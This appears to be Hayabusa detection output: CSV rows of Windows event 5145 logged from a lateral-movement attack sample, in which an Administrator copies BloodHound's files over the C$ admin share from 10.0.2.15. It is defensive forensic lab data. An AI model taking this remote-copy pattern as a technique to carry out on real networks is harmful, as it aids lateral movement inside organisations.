+2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\object  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\reflect  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\regexp  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\string  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\symbol  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\system  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\helpers  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\regenerator  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\balanced-match  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\big-integer  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\example  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\perf  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\browser  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\release  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\css  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\fonts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\js  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\fonts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\grunt  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\js  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less\mixins  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap-3-typeahead  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\inspectionProfiles  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\markdown-navigator  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\brace-expansion  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-from  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-shims  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\types  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\classnames  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors\themes  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander\typings  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
